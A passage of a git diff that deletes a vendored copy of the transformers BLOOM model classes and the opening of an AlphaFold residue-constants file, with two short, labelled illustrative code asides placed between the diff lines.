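assert torch.equal(std_key.reshape(batch_size * num_heads, head_dim, kv_length), key)
assert torch.equal(std_value.reshape(batch_size * num_heads, kv_length, head_dim), value)
# ------------------------------------------------------------------------------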
- - Each element of `past_key_values` is a tuple (past_key, past_value): - - past_key: [batch_size * num_heads, head_dim, kv_length] - - past_value: [batch_size * num_heads, kv_length, head_dim] - attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*): - Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*): - Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This - is useful if you want more control over how to convert `input_ids` indices into associated vectors than the - model's internal embedding lookup matrix. - - If `past_key_values` is used, optionally only the last `inputs_embeds` have to be input (see - `past_key_values`). - use_cache (`bool`, *optional*): - If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see - `past_key_values`). - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned - tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for - more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple. 
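# --- Editor's illustrative aside (not part of the original file) ---------------
# A hedged usage sketch tying the inputs documented above to the model outputs.
# The checkpoint name mirrors `_CHECKPOINT_FOR_DOC` above; everything else is a
# typical-usage assumption rather than the library's canonical example.
import torch
from transformers import AutoTokenizer, BloomForCausalLM

tokenizer = AutoTokenizer.from_pretrained("bigscience/bloom-560m")
model = BloomForCausalLM.from_pretrained("bigscience/bloom-560m")

inputs = tokenizer("Hello, my name is", return_tensors="pt")
with torch.no_grad():
    outputs = model(**inputs, use_cache=True, output_hidden_states=True)

print(outputs.logits.shape)           # [batch_size, sequence_length, vocab_size]
print(len(outputs.past_key_values))   # one (key, value) pair per layer, reusable for decoding
# ------------------------------------------------------------------------------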
-""" - - -@add_start_docstrings( - "The bare Bloom Model transformer outputting raw hidden-states without any specific head on top.", - BLOOM_START_DOCSTRING, -) -class BloomModel(BloomPreTrainedModel): - def __init__(self, config: BloomConfig): - super().__init__(config) - - self.embed_dim = config.hidden_size - self.num_heads = config.n_head - - # Embedding + LN Embedding - self.word_embeddings = nn.Embedding(config.vocab_size, self.embed_dim) - self.word_embeddings_layernorm = LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon) - - # Transformer blocks - self.h = nn.ModuleList([BloomBlock(config) for _ in range(config.num_hidden_layers)]) - - # Final Layer Norm - self.ln_f = LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon) - - self.gradient_checkpointing = False - - # Initialize weights and apply final processing - self.post_init() - - def build_alibi_tensor(self, attention_mask: torch.Tensor, num_heads: int, dtype: torch.dtype) -> torch.Tensor: - return build_alibi_tensor(attention_mask, num_heads, dtype) - - def get_input_embeddings(self): - return self.word_embeddings - - def _prepare_attn_mask( - self, attention_mask: torch.Tensor, input_shape: Tuple[int, int], past_key_values_length: int - ) -> torch.BoolTensor: - # create causal mask - # [batch_size, seq_length] -> [batch_size, 1, tgt_length, src_length] - combined_attention_mask = None - device = attention_mask.device - _, src_length = input_shape - - if src_length > 1: - combined_attention_mask = _make_causal_mask( - input_shape, device=device, past_key_values_length=past_key_values_length - ) - - # [batch_size, seq_length] -> [batch_size, 1, tgt_length, src_length] - expanded_attn_mask = _expand_mask(attention_mask, tgt_length=src_length) - combined_attention_mask = ( - expanded_attn_mask if combined_attention_mask is None else expanded_attn_mask | combined_attention_mask - ) - - return combined_attention_mask - - def set_input_embeddings(self, new_embeddings: torch.Tensor): - self.word_embeddings = new_embeddings - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=BaseModelOutputWithPastAndCrossAttentions, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor, torch.Tensor], ...]] = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.LongTensor] = None, - inputs_embeds: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - **deprecated_arguments, - ) -> Union[Tuple[torch.Tensor, ...], BaseModelOutputWithPastAndCrossAttentions]: - if deprecated_arguments.pop("position_ids", False) is not False: - # `position_ids` could have been `torch.Tensor` or `None` so defaulting pop to `False` allows to detect if users were passing explicitly `None` - warnings.warn( - "`position_ids` have no functionality in BLOOM and will be removed in v5.0.0. 
You can safely ignore" - " passing `position_ids`.", - FutureWarning, - ) - if len(deprecated_arguments) > 0: - raise ValueError(f"Got unexpected arguments: {deprecated_arguments}") - - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - use_cache = use_cache if use_cache is not None else self.config.use_cache - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - if input_ids is not None and inputs_embeds is not None: - raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") - elif input_ids is not None: - batch_size, seq_length = input_ids.shape - elif inputs_embeds is not None: - batch_size, seq_length, _ = inputs_embeds.shape - else: - raise ValueError("You have to specify either input_ids or inputs_embeds") - - if past_key_values is None: - past_key_values = tuple([None] * len(self.h)) - - # Prepare head mask if needed - # 1.0 in head_mask indicate we keep the head - # attention_probs has shape batch_size x num_heads x N x N - # head_mask has shape n_layer x batch x num_heads x N x N - head_mask = self.get_head_mask(head_mask, self.config.n_layer) - - if inputs_embeds is None: - inputs_embeds = self.word_embeddings(input_ids) - - hidden_states = self.word_embeddings_layernorm(inputs_embeds) - - presents = () if use_cache else None - all_self_attentions = () if output_attentions else None - all_hidden_states = () if output_hidden_states else None - - if self.gradient_checkpointing and self.training: - if use_cache: - logger.warning_once( - "`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..." 
- ) - use_cache = False - - # Compute alibi tensor: check build_alibi_tensor documentation - seq_length_with_past = seq_length - past_key_values_length = 0 - if past_key_values[0] is not None: - past_key_values_length = past_key_values[0][0].shape[2] - seq_length_with_past = seq_length_with_past + past_key_values_length - if attention_mask is None: - attention_mask = torch.ones((batch_size, seq_length_with_past), device=hidden_states.device) - else: - attention_mask = attention_mask.to(hidden_states.device) - - alibi = self.build_alibi_tensor(attention_mask, self.num_heads, dtype=hidden_states.dtype) - - causal_mask = self._prepare_attn_mask( - attention_mask, - input_shape=(batch_size, seq_length), - past_key_values_length=past_key_values_length, - ) - - for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)): - if output_hidden_states: - all_hidden_states = all_hidden_states + (hidden_states,) - - if self.gradient_checkpointing and self.training: - - def create_custom_forward(module): - def custom_forward(*inputs): - # None for past_key_value - return module(*inputs, use_cache=use_cache, output_attentions=output_attentions) - - return custom_forward - - outputs = torch.utils.checkpoint.checkpoint( - create_custom_forward(block), - hidden_states, - alibi, - causal_mask, - layer_past, - head_mask[i], - ) - else: - outputs = block( - hidden_states, - layer_past=layer_past, - attention_mask=causal_mask, - head_mask=head_mask[i], - use_cache=use_cache, - output_attentions=output_attentions, - alibi=alibi, - ) - - hidden_states = outputs[0] - if use_cache is True: - presents = presents + (outputs[1],) - - if output_attentions: - all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],) - - # Add last hidden state - hidden_states = self.ln_f(hidden_states) - - if output_hidden_states: - all_hidden_states = all_hidden_states + (hidden_states,) - - if not return_dict: - return tuple(v for v in [hidden_states, presents, all_hidden_states, all_self_attentions] if v is not None) - - return BaseModelOutputWithPastAndCrossAttentions( - last_hidden_state=hidden_states, - past_key_values=presents, - hidden_states=all_hidden_states, - attentions=all_self_attentions, - ) - - -@add_start_docstrings( - """ - The Bloom Model transformer with a language modeling head on top (linear layer with weights tied to the input - embeddings). - """, - BLOOM_START_DOCSTRING, -) -class BloomForCausalLM(BloomPreTrainedModel): - _tied_weights_keys = ["lm_head.weight"] - - def __init__(self, config: BloomConfig): - super().__init__(config) - self.transformer = BloomModel(config) - self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False) - - # Initialize weights and apply final processing - self.post_init() - - def get_output_embeddings(self): - return self.lm_head - - def set_output_embeddings(self, new_embeddings: torch.Tensor): - self.lm_head = new_embeddings - - def prepare_inputs_for_generation( - self, - input_ids: torch.LongTensor, - past_key_values: Optional[torch.Tensor] = None, - attention_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.Tensor] = None, - **kwargs, - ) -> dict: - # only last token for input_ids if past is not None - if past_key_values: - input_ids = input_ids[:, -1].unsqueeze(-1) - - # the cache may be in the stardard format (e.g. 
in contrastive search), convert to bloom's format if needed - if past_key_values[0][0].shape[0] == input_ids.shape[0]: - past_key_values = self._convert_to_bloom_cache(past_key_values) - - # if `inputs_embeds` are passed, we only want to use them in the 1st generation step - if inputs_embeds is not None and past_key_values is None: - model_inputs = {"inputs_embeds": inputs_embeds} - else: - model_inputs = {"input_ids": input_ids} - - model_inputs.update( - { - "past_key_values": past_key_values, - "use_cache": kwargs.get("use_cache"), - "attention_mask": attention_mask, - } - ) - return model_inputs - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=CausalLMOutputWithCrossAttentions, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor, torch.Tensor], ...]] = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.Tensor] = None, - labels: Optional[torch.Tensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - **deprecated_arguments, - ) -> Union[Tuple[torch.Tensor], CausalLMOutputWithCrossAttentions]: - r""" - labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set - `labels = input_ids` Indices are selected in `[-100, 0, ..., config.vocab_size]` All labels set to `-100` - are ignored (masked), the loss is only computed for labels in `[0, ..., config.vocab_size]` - """ - if deprecated_arguments.pop("position_ids", False) is not False: - # `position_ids` could have been `torch.Tensor` or `None` so defaulting pop to `False` allows to detect if users were passing explicitly `None` - warnings.warn( - "`position_ids` have no functionality in BLOOM and will be removed in v5.0.0. 
You can safely ignore" - " passing `position_ids`.", - FutureWarning, - ) - if len(deprecated_arguments) > 0: - raise ValueError(f"Got unexpected arguments: {deprecated_arguments}") - - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - transformer_outputs = self.transformer( - input_ids, - past_key_values=past_key_values, - attention_mask=attention_mask, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - hidden_states = transformer_outputs[0] - - lm_logits = self.lm_head(hidden_states) - - loss = None - if labels is not None: - # move labels to correct device to enable model parallelism - labels = labels.to(lm_logits.device) - # Shift so that tokens < n predict n - shift_logits = lm_logits[..., :-1, :].contiguous() - shift_labels = labels[..., 1:].contiguous() - batch_size, seq_length, vocab_size = shift_logits.shape - # Flatten the tokens - loss_fct = CrossEntropyLoss() - loss = loss_fct( - shift_logits.view(batch_size * seq_length, vocab_size), shift_labels.view(batch_size * seq_length) - ) - - if not return_dict: - output = (lm_logits,) + transformer_outputs[1:] - return ((loss,) + output) if loss is not None else output - - return CausalLMOutputWithCrossAttentions( - loss=loss, - logits=lm_logits, - past_key_values=transformer_outputs.past_key_values, - hidden_states=transformer_outputs.hidden_states, - attentions=transformer_outputs.attentions, - ) - - def _reorder_cache( - self, past: Tuple[Tuple[torch.Tensor, torch.Tensor], ...], beam_idx: torch.LongTensor - ) -> Tuple[Tuple[torch.Tensor, torch.Tensor], ...]: - """ - This function is used to re-order the `past_key_values` cache if [`~PreTrainedModel.beam_search`] or - [`~PreTrainedModel.beam_sample`] is called. This is required to match `past_key_values` with the correct - beam_idx at every generation step. - - Output shares the same memory storage as `past`. - """ - standardized_past = self._convert_to_standard_cache(past, batch_size=len(beam_idx)) - - # Get a copy of `beam_idx` on all the devices where we need those indices. - device_to_beam_idx = { - past_state.device: beam_idx.to(past_state.device) for layer_past in past for past_state in layer_past - } - reordered_past = tuple( - ( - layer_past[0].index_select(0, device_to_beam_idx[layer_past[0].device]), - layer_past[1].index_select(0, device_to_beam_idx[layer_past[0].device]), - ) - for layer_past in standardized_past - ) - return self._convert_to_bloom_cache(reordered_past) - - -@add_start_docstrings( - """ - The Bloom Model transformer with a sequence classification head on top (linear layer). - - [`BloomForSequenceClassification`] uses the last token in order to do the classification, as other causal models - (e.g. GPT-1) do. - - Since it does classification on the last token, it requires to know the position of the last token. If a - `pad_token_id` is defined in the configuration, it finds the last token that is not a padding token in each row. If - no `pad_token_id` is defined, it simply takes the last value in each row of the batch. Since it cannot guess the - padding tokens when `inputs_embeds` are passed instead of `input_ids`, it does the same (take the last value in - each row of the batch). 
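# --- Editor's illustrative aside (not part of the original file) ---------------
# A minimal sketch of the "last non-padding token" pooling rule described above,
# assuming a known pad_token_id; the tensors below are toy values for illustration.
import torch

pad_token_id = 3
input_ids = torch.tensor([[5, 7, 9, 3, 3],
                          [6, 4, 3, 3, 3]])        # [batch_size, seq_length]
logits = torch.randn(2, 5, 4)                      # [batch_size, seq_length, num_labels]

# Index of the last real token in each row (here 2 and 1), then gather its logits.
sequence_lengths = torch.ne(input_ids, pad_token_id).sum(-1) - 1
pooled_logits = logits[torch.arange(input_ids.shape[0]), sequence_lengths]
print(pooled_logits.shape)  # torch.Size([2, 4]) -> one [num_labels] vector per sequence
# ------------------------------------------------------------------------------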
- """, - BLOOM_START_DOCSTRING, -) -class BloomForSequenceClassification(BloomPreTrainedModel): - def __init__(self, config: BloomConfig): - super().__init__(config) - self.num_labels = config.num_labels - self.transformer = BloomModel(config) - self.score = nn.Linear(config.hidden_size, config.num_labels, bias=False) - - # Initialize weights and apply final processing - self.post_init() - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=SequenceClassifierOutputWithPast, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor, torch.Tensor], ...]] = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.Tensor] = None, - labels: Optional[torch.Tensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - **deprecated_arguments, - ) -> Union[Tuple[torch.Tensor], SequenceClassifierOutputWithPast]: - r""" - labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for computing the sequence classification/regression loss. Indices should be in `[0, ..., - config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If - `config.num_labels > 1` a classification loss is computed (Cross-Entropy). - """ - if deprecated_arguments.pop("position_ids", False) is not False: - # `position_ids` could have been `torch.Tensor` or `None` so defaulting pop to `False` allows to detect if users were passing explicitly `None` - warnings.warn( - "`position_ids` have no functionality in BLOOM and will be removed in v5.0.0. You can safely ignore" - " passing `position_ids`.", - FutureWarning, - ) - if len(deprecated_arguments) > 0: - raise ValueError(f"Got unexpected arguments: {deprecated_arguments}") - - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - transformer_outputs = self.transformer( - input_ids, - past_key_values=past_key_values, - attention_mask=attention_mask, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - hidden_states = transformer_outputs[0] - logits = self.score(hidden_states) - - if input_ids is not None: - batch_size = input_ids.shape[0] - else: - batch_size = inputs_embeds.shape[0] - - if self.config.pad_token_id is None and batch_size != 1: - raise ValueError("Cannot handle batch sizes > 1 if no padding token is defined.") - if self.config.pad_token_id is None: - sequence_lengths = -1 - else: - if input_ids is not None: - sequence_lengths = (torch.ne(input_ids, self.config.pad_token_id).sum(-1) - 1).to(logits.device) - else: - sequence_lengths = -1 - logger.warning( - f"{self.__class__.__name__} will not detect padding tokens in `inputs_embeds`. 
Results may be " - "unexpected if using padding tokens in conjunction with `inputs_embeds.`" - ) - - pooled_logits = logits[torch.arange(batch_size, device=logits.device), sequence_lengths] - - loss = None - if labels is not None: - if self.config.problem_type is None: - if self.num_labels == 1: - self.config.problem_type = "regression" - elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int): - self.config.problem_type = "single_label_classification" - else: - self.config.problem_type = "multi_label_classification" - - if self.config.problem_type == "regression": - loss_fct = MSELoss() - if self.num_labels == 1: - loss = loss_fct(pooled_logits.squeeze(), labels.squeeze()) - else: - loss = loss_fct(pooled_logits, labels) - elif self.config.problem_type == "single_label_classification": - loss_fct = CrossEntropyLoss() - loss = loss_fct(pooled_logits, labels) - elif self.config.problem_type == "multi_label_classification": - loss_fct = BCEWithLogitsLoss() - loss = loss_fct(pooled_logits, labels) - if not return_dict: - output = (pooled_logits,) + transformer_outputs[1:] - return ((loss,) + output) if loss is not None else output - - return SequenceClassifierOutputWithPast( - loss=loss, - logits=pooled_logits, - past_key_values=transformer_outputs.past_key_values, - hidden_states=transformer_outputs.hidden_states, - attentions=transformer_outputs.attentions, - ) - - -@add_start_docstrings( - """ - Bloom Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for - Named-Entity-Recognition (NER) tasks. - """, - BLOOM_START_DOCSTRING, -) -class BloomForTokenClassification(BloomPreTrainedModel): - def __init__(self, config: BloomConfig): - super().__init__(config) - self.num_labels = config.num_labels - - self.transformer = BloomModel(config) - if hasattr(config, "classifier_dropout") and config.classifier_dropout is not None: - classifier_dropout = config.classifier_dropout - elif hasattr(config, "hidden_dropout") and config.hidden_dropout is not None: - classifier_dropout = config.hidden_dropout - else: - classifier_dropout = 0.1 - self.dropout = nn.Dropout(classifier_dropout) - self.classifier = nn.Linear(config.hidden_size, config.num_labels) - - # Initialize weights and apply final processing - self.post_init() - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=TokenClassifierOutput, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor, torch.Tensor], ...]] = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.Tensor] = None, - labels: Optional[torch.Tensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - **deprecated_arguments, - ) -> Union[Tuple[torch.Tensor], TokenClassifierOutput]: - r""" - labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for computing the sequence classification/regression loss. Indices should be in `[0, ..., - config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If - `config.num_labels > 1` a classification loss is computed (Cross-Entropy). 
- """ - if deprecated_arguments.pop("position_ids", False) is not False: - # `position_ids` could have been `torch.Tensor` or `None` so defaulting pop to `False` allows to detect if users were passing explicitly `None` - warnings.warn( - "`position_ids` have no functionality in BLOOM and will be removed in v5.0.0. You can safely ignore" - " passing `position_ids`.", - FutureWarning, - ) - if len(deprecated_arguments) > 0: - raise ValueError(f"Got unexpected arguments: {deprecated_arguments}") - - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - transformer_outputs = self.transformer( - input_ids, - past_key_values=past_key_values, - attention_mask=attention_mask, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - hidden_states = transformer_outputs[0] - hidden_states = self.dropout(hidden_states) - logits = self.classifier(hidden_states) - - loss = None - if labels is not None: - # move labels to correct device to enable model parallelism - labels = labels.to(logits.device) - batch_size, seq_length = labels.shape - loss_fct = CrossEntropyLoss() - loss = loss_fct( - logits.view(batch_size * seq_length, self.num_labels), labels.view(batch_size * seq_length) - ) - - if not return_dict: - output = (logits,) + transformer_outputs[2:] - return ((loss,) + output) if loss is not None else output - - return TokenClassifierOutput( - loss=loss, - logits=logits, - hidden_states=transformer_outputs.hidden_states, - attentions=transformer_outputs.attentions, - ) - - -@add_start_docstrings( - """ - The BLOOM Model transformer with a span classification head on top for extractive question-answering tasks like - SQuAD (a linear layers on top of the hidden-states output to compute `span start logits` and `span end logits`). - """, - BLOOM_START_DOCSTRING, -) -class BloomForQuestionAnswering(BloomPreTrainedModel): - def __init__(self, config): - super().__init__(config) - self.transformer = BloomModel(config) - self.qa_outputs = nn.Linear(config.hidden_size, 2) - - # Initialize weights and apply final processing - self.post_init() - - @add_start_docstrings_to_model_forward(BLOOM_INPUTS_DOCSTRING.format("batch_size, sequence_length")) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - attention_mask: Optional[torch.FloatTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - start_positions: Optional[torch.LongTensor] = None, - end_positions: Optional[torch.LongTensor] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, QuestionAnsweringModelOutput]: - r""" - start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for position (index) of the start of the labelled span for computing the token classification loss. - Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence - are not taken into account for computing the loss. - end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for position (index) of the end of the labelled span for computing the token classification loss. - Positions are clamped to the length of the sequence (`sequence_length`). 
Position outside of the sequence - are not taken into account for computing the loss. - """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - outputs = self.transformer( - input_ids, - attention_mask=attention_mask, - position_ids=position_ids, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - sequence_output = outputs[0] - - logits = self.qa_outputs(sequence_output) - start_logits, end_logits = logits.split(1, dim=-1) - start_logits = start_logits.squeeze(-1).contiguous() - end_logits = end_logits.squeeze(-1).contiguous() - - total_loss = None - if start_positions is not None and end_positions is not None: - # If we are on multi-GPU, split add a dimension - if len(start_positions.size()) > 1: - start_positions = start_positions.squeeze(-1) - if len(end_positions.size()) > 1: - end_positions = end_positions.squeeze(-1) - # sometimes the start/end positions are outside our model inputs, we ignore these terms - ignored_index = start_logits.size(1) - start_positions = start_positions.clamp(0, ignored_index) - end_positions = end_positions.clamp(0, ignored_index) - - loss_fct = CrossEntropyLoss(ignore_index=ignored_index) - start_loss = loss_fct(start_logits, start_positions) - end_loss = loss_fct(end_logits, end_positions) - total_loss = (start_loss + end_loss) / 2 - - if not return_dict: - output = (start_logits, end_logits) + outputs[2:] - return ((total_loss,) + output) if total_loss is not None else output - - return QuestionAnsweringModelOutput( - loss=total_loss, - start_logits=start_logits, - end_logits=end_logits, - hidden_states=outputs.hidden_states, - attentions=outputs.attentions, - ) diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/esm/openfold_utils/residue_constants.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/esm/openfold_utils/residue_constants.py deleted file mode 100644 index 8f0ad3b50c65050a4ffd4370e9b4f3a3312fc723..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/esm/openfold_utils/residue_constants.py +++ /dev/null @@ -1,983 +0,0 @@ -# Copyright 2021 AlQuraishi Laboratory -# Copyright 2021 DeepMind Technologies Limited -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""Constants used in AlphaFold.""" - -import collections -import copy -import functools -from importlib import resources -from typing import Dict, List, Mapping, Sequence, Tuple - -import numpy as np - - -# Internal import (35fd). - - -# Distance from one CA to next CA [trans configuration: omega = 180]. -ca_ca = 3.80209737096 - -# Format: The list for each AA type contains chi1, chi2, chi3, chi4 in -# this order (or a relevant subset from chi1 onwards). ALA and GLY don't have -# chi angles so their chi angle lists are empty. 
-chi_angles_atoms: Dict[str, List[List[str]]] = { - "ALA": [], - # Chi5 in arginine is always 0 +- 5 degrees, so ignore it. - "ARG": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"], ["CB", "CG", "CD", "NE"], ["CG", "CD", "NE", "CZ"]], - "ASN": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "OD1"]], - "ASP": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "OD1"]], - "CYS": [["N", "CA", "CB", "SG"]], - "GLN": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"], ["CB", "CG", "CD", "OE1"]], - "GLU": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"], ["CB", "CG", "CD", "OE1"]], - "GLY": [], - "HIS": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "ND1"]], - "ILE": [["N", "CA", "CB", "CG1"], ["CA", "CB", "CG1", "CD1"]], - "LEU": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD1"]], - "LYS": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"], ["CB", "CG", "CD", "CE"], ["CG", "CD", "CE", "NZ"]], - "MET": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "SD"], ["CB", "CG", "SD", "CE"]], - "PHE": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD1"]], - "PRO": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD"]], - "SER": [["N", "CA", "CB", "OG"]], - "THR": [["N", "CA", "CB", "OG1"]], - "TRP": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD1"]], - "TYR": [["N", "CA", "CB", "CG"], ["CA", "CB", "CG", "CD1"]], - "VAL": [["N", "CA", "CB", "CG1"]], -} - -# If chi angles given in fixed-length array, this matrix determines how to mask -# them for each AA type. The order is as per restype_order (see below). -chi_angles_mask: List[List[float]] = [ - [0.0, 0.0, 0.0, 0.0], # ALA - [1.0, 1.0, 1.0, 1.0], # ARG - [1.0, 1.0, 0.0, 0.0], # ASN - [1.0, 1.0, 0.0, 0.0], # ASP - [1.0, 0.0, 0.0, 0.0], # CYS - [1.0, 1.0, 1.0, 0.0], # GLN - [1.0, 1.0, 1.0, 0.0], # GLU - [0.0, 0.0, 0.0, 0.0], # GLY - [1.0, 1.0, 0.0, 0.0], # HIS - [1.0, 1.0, 0.0, 0.0], # ILE - [1.0, 1.0, 0.0, 0.0], # LEU - [1.0, 1.0, 1.0, 1.0], # LYS - [1.0, 1.0, 1.0, 0.0], # MET - [1.0, 1.0, 0.0, 0.0], # PHE - [1.0, 1.0, 0.0, 0.0], # PRO - [1.0, 0.0, 0.0, 0.0], # SER - [1.0, 0.0, 0.0, 0.0], # THR - [1.0, 1.0, 0.0, 0.0], # TRP - [1.0, 1.0, 0.0, 0.0], # TYR - [1.0, 0.0, 0.0, 0.0], # VAL -] - -# The following chi angles are pi periodic: they can be rotated by a multiple -# of pi without affecting the structure. -chi_pi_periodic: List[List[float]] = [ - [0.0, 0.0, 0.0, 0.0], # ALA - [0.0, 0.0, 0.0, 0.0], # ARG - [0.0, 0.0, 0.0, 0.0], # ASN - [0.0, 1.0, 0.0, 0.0], # ASP - [0.0, 0.0, 0.0, 0.0], # CYS - [0.0, 0.0, 0.0, 0.0], # GLN - [0.0, 0.0, 1.0, 0.0], # GLU - [0.0, 0.0, 0.0, 0.0], # GLY - [0.0, 0.0, 0.0, 0.0], # HIS - [0.0, 0.0, 0.0, 0.0], # ILE - [0.0, 0.0, 0.0, 0.0], # LEU - [0.0, 0.0, 0.0, 0.0], # LYS - [0.0, 0.0, 0.0, 0.0], # MET - [0.0, 1.0, 0.0, 0.0], # PHE - [0.0, 0.0, 0.0, 0.0], # PRO - [0.0, 0.0, 0.0, 0.0], # SER - [0.0, 0.0, 0.0, 0.0], # THR - [0.0, 0.0, 0.0, 0.0], # TRP - [0.0, 1.0, 0.0, 0.0], # TYR - [0.0, 0.0, 0.0, 0.0], # VAL - [0.0, 0.0, 0.0, 0.0], # UNK -] - -# Atoms positions relative to the 8 rigid groups, defined by the pre-omega, phi, -# psi and chi angles: -# 0: 'backbone group', -# 1: 